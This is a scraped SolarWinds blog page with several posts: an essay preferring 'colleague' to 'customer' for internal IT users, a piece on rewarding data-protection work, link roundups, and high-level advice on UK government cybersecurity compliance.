Meanwhile, for the person receiving those services, as a customer, there’s quite a range of options. Foremost among these is that I can fire a provider. I can put out an RFP and pick the provider who offers me the best services for my needs. I can haggle on price. I can set an SLA with monetary penalties for non-compliance. I can select a new technical direction, and if my current provider is not experienced, I can bring in a different one.


But as an internal staff requesting service from the IT department, I have almost none of those options. I can’t “fire” my IT department. Sure, I might go around the system and bring in a contractor to build a parallel, “shadow IT” structure. But at the end of the day, I’m going to need to have an official IT person get me into Active Directory, route my data, set up my database, and so on. There’s only so much a shadow IT operation can do before it gets noticed (and shut down). I can’t go down the street and ask the other IT department to give me a second bid for the same services. I can’t charge a penalty when my IT department doesn’t deliver the service they said they would. And if I (the business “decider”) choose to go a new technical route, I must wait for the IT department to catch up or bring in consultants NOT to replace my IT department, but to cover the gap until they get up to speed.


Whether we mean to or not, whether we like it or not, and whether you agree with me or not, I have found that using the word "customer" conjures at least some of those expectations.


But there’s one other giant issue when you use the word “customer,” and that’s the fact that people often confuse “customer” with “consumer.” That’s not an IT issue, that’s a life issue. The thing to keep in mind is that the customer is the person who pays for the service. The consumer is the person who receives (enjoys) the service. And the two are not always the same. I’m not just talking about taking my kids out to ice cream.


A great example is the NFL. According to Wikipedia, the NFL television blackout policies were, until they were largely over-ridden in 2014, the strictest among North American sports leagues. In brief, the blackout rules state that “…a home game cannot be televised in the team's local market if all tickets are not sold out 72 hours prior to its start time.” Prior to 1973, this blackout rule applied to all TV stations within a 75-mile radius of the game.


How is this possible? Are we, the fans, not the customers of football? Even if I’m not going to THIS game, I certainly would want to watch each game so that the ones I DO attend are part of a series of experiences, right?


The answer is that I’m not the customer. I’m the consumer. The customer is “the stadium” (the owners, the vendors, the advertisers). They are the ones putting up the money for the event, and they want to make their money back by ensuring sold-out crowds. The people who watch the game—whether in the stands or over the airwaves—are merely consumers.


In IT terms, the end-user is NOT the customer. They are the consumer. Management is the customer—the one footing the bill. If management says the entire company is moving to virtual desktops, it doesn’t matter whether the consumer wants, needs, or likes that decision.


So again, calling the folks who receive IT services a “customer” sets up a completely false set of expectations in the minds of everyone involved about how this relationship is going to play out.


However, there is another word that exists, within easy reach, that is far more accurate in describing the relationship, and also has the ability to create the behaviors we want when we (ill-advisedly) try to shoehorn “customer” into that spot. And that word is: “colleague.”


A colleague is someone I collaborate with. Maybe not on a day-to-day basis or in terms of my actual activities, but we work together to achieve the same goal (in the largest sense, whatever the goals of the business are). A colleague is someone I can’t “fire” or replace or solicit a bid from another provider about.


“Colleague” also creates the (very real) understanding that this relationship is long-term. Jane in the mailroom may become Jane in accounting, and later Jane the CFO. Through it all she remains my colleague. The relationship I build with her endures and my behavior toward her matters.


So, I’m going to remain stubbornly against using the word “customer” to refer to my colleagues. It de-values them and it de-values the relationship I want to have with them, and the one I hope they have with me.

Game tile spelling out "DATA"

Building a culture that favors protecting data can be challenging. In fact, most of us who love our data spend a huge amount of time standing up for our data when it seems everyone else wants to take the easiest route to getting stuff done. I can hear the pleas from here:


  • We don't have time to deal with SQL injection now. We will get to that later.
  • If we add encryption to this data, our queries will run longer. It will make the database larger, which will also affect performance. We can do that later if we get the performance issues fixed.
  • I don't want to keep typing our these long, complex passwords. They are painful.
  • Multi-factor authentication means I have to keep my phone near me. Plus, it's a pain.
  • Security is the job of the security team. They are a painful bunch of people.


…and so on. What my team members don't seem to understand is that these pain points are supposed to be painful. The locks on my house doors are painful. The keys to my car are painful. The PIN on my credit card is painful. All of these are set up, intentionally, as obstacles to access -- not my access, but unauthorized access. What is it about team members who lock their doors, shred sensitive documents, and keep their collector action figures under glass that don't want to protect the data we steward on behalf of customers? In my experience, these people don't want to protect data because they are measured, compensated, and punished in ways that take away almost all the incentives to do so. Developers and programmers are measured on the speed of delivery. DBAs are measured on uptime and performance. SysAdmins are measured on provisioning resources. And rarely have these roles been measured and rewarded for security and privacy compliance.


To Reward, We Must Measure


How do we fix this? We start rewarding people for data protection activities. To reward people, we need to measure their deliverables.


  • An enterprise-wide security policy and framework that includes specific measures at the data category level
  • Encryption design, starting with the data models
  • Data categorization and modeling
  • Test design that includes security and privacy testing
  • Proactive recognition of security requirements and techniques
  • Data profiling testing that discovers unprotected or under-protected data
  • Data security monitoring and alerting
  • Issue management and reporting


As for the rewards, they need to focus on the early introduction of data protection features and service. This includes reviewing designs and user stories for security requirements.


Then we get to the hard part: I'm of a thought that specific rewards for doing what was expected of me are over the top. But I recognize that this isn't always the best way to motivate positive actions. Besides, as I will get into later in this series, the organizational punishments for not protecting data may be so large that a company will not be able to afford the lack of data protection culture we currently have. Plus, we don't want to have to use a prison time measurement to encourage data protection.


In this series, I'll be discussing data protection actions, why they are important, and how we can be better at data. Until then, I'll love to hear about what, if any, data protection reward (or punishment) systems your organization has in place today.

I hope everyone had a wonderful holiday six-day weekend. The second half of the year has begun. There is still time to accomplish the goals you set at the start of the year.


As always, here are some links from the Intertubz that I hope will hold your interest. Enjoy!


London police chief ‘completely comfortable’ using facial recognition with 98 percent error rate

It would seem that a reasonable person would understand that this technology isn’t ready, and that having a high number of mistakes leads to a lot of extra work by the police.


Why Won’t Millennials Join Country Clubs?

Because they are too busy paying down ridiculous student debt and mortgages?


Spiders Can Fly Hundreds of Miles Using Electricity

And they can crawl inside your ear when you sleep. Anyway, sweet dreams kids!


Manual Work is a Bug

A bit long but worth the time. Always be automating.


MoviePass is running out of money and needs to raise $1.2 billion

For $10 a month you can watch $300 worth of movies, which explains why MoviePass is bleeding cash right now. But hey, don’t let a good business model get in the way of that VC money.


If You Say Something Is “Likely,” How Likely Do People Think It Is?

I am certain that probably 60% of Actuator readers are likely to enjoy this article half the time.


US nickels cost seven cents to make. Scientists may have a solution

Sadly, the answer isn’t “get rid of nickels.” I’m fascinated about the downstream implications on this, and why our government should care that vending machines were built upon the assumption that coins would never change. Get rid of all coins, introduce machines that use cards and phones, and move into the 21st century, please.


How I spent my holiday weekend: building a fire pit, retaining wall, and spreading 3 cubic yards of pea stone. Who wants some scotch and s'mores?

By Paul Parker, SolarWinds Federal & National Government Chief Technologist


For the public sector to maintain a suitable level of cybersecurity, the U.K. government has implemented some initiatives to guide organizations on how to do so effectively. In June 2017, the National Cyber Security Centre (NCSC) rolled out four measures as part of the Active Cyber Defence (ACD) program to assist government departments and arms-length public bodies in increasing their fundamental cybersecurity.


These four measures intend to make it more difficult for criminals to carry out attacks. They include blocking malicious web addresses from being accessed from government systems, blocking fake emails pretending to be the government, and helping public bodies fix security vulnerabilities on their website. The fourth measure relates to spotting and taking down phishing scams from the internet when the NCSC spots a site pretending to be a public-sector department or business.


Government IT professionals must incorporate strategies and solutions that make it easier for them to meet their compliance expectations. We suggest an approach on three fronts.


Step 1: Ensure network configurations are automated


One of the things departments should do to comply with the government’s security expectations is to monitor and manage their network configuration statuses. Automating network configuration management processes can make it much easier to help ensure compliance with key cybersecurity initiatives. Device configurations should be backed up and restored automatically, and alerts should be set up to advise administrators whenever an unauthorized change occurs.


Step 2: Make reporting a priority


Maintaining strong security involves prioritizing tracking and reporting. These reports should include details on configuration changes, policy compliance, security, and more. They should be easily readable, shareable, and exportable, and include all relevant details to show that they remain up-to-date with government standards.


Step 3: Automate patches and stamp out suspicious activity


IT administrators should also incorporate log and event management tools to strengthen their security postures. Like a watchdog, these solutions are designed to be on alert for suspicious activity, and can alert administrators or take actions when a potentially malicious threat is detected. This complements existing government safeguards like protected Domain Name System (DNS) and DMARC anti-spoofing.


Implementing automated patch management is another effective way to help make sure that network technologies remain available, secure, and up-to-date. Government departments must stay on top of their patch management to combat threats and help maintain strong security. The best way to do this is to manage patches from a centralized dashboard.


Keeping up with the guidelines proposed in initiatives such as the ACD program can be a tricky and complicated process, but it doesn’t have to be that way. By integrating these simple but effective steps, government IT professionals are better positioned to efficiently follow the guidelines and up their security game, protecting not just themselves, but the government’s reputation.


Find the full article on Central Government.

Happy 4th of July! Holiday or not, the Actuator always delivers. I do hope you are taking the time to spend with family and friends today. You can come back and read this post later, I won’t mind.


As always, here are some links from the Intertubz that I hope will hold your interest. Enjoy!


Debugging Serverless Apps: from monitoring invocations to observing a system of functions

As our systems become more complex, it becomes more important than ever to start labeling everything we can. Metadata will become your most important data asset.


4 Types of Idle Cloud Resources That Are Wasting Your Money

Speaking of containers, they are likely a vampire resource in your cloud environment along with a handful of other allocated resources which are lightly used.


Dealing with the insider threat on your network

Buried in this article is this gem: “…security is not so much about monitoring the perimeter anymore; companies need to be looking on the inside - how communications are happening on the network, how systems are talking to each other and most importantly what are the users doing on the network.” This is why anomaly detection, built on top of machine learning algorithms, are the next generation of tools to defend against threats.


LA Fitness, ‘Hotel California’ and the fallacy of digital transformation

The author uses LA Fitness as one example, but I know of dozens more. This scenario is very common, where a company chooses to modernize only parts of their business. Usually, the part chosen is one that generates revenue, and not with customer service.


Apple is rebuilding Maps from the ground up

Two interesting parts to this story. The first is the admission that Apple knew their Maps feature was going to be poor right from the start, but they knew they needed to launch something. Second, the way they are making an effort to collect data and respect user privacy at the same time.


Here's how Amazon is able to poach so many execs from Microsoft

The answer combines a dollar sign in front and lots of numbers after.


About 300K expected to visit Las Vegas for July 4th

With July 4th on a Wednesday, more and more people are thinking "WOOHOO, SIX DAY WEEKEND!"


Happy Independence Day! Here's a picture of me riding an eagle:


Filter Blog

By date: By tag:

SolarWinds uses cookies on its websites to make your online experience easier and better. By using our website, you consent to our use of cookies. For more information on cookies, see our cookie policy.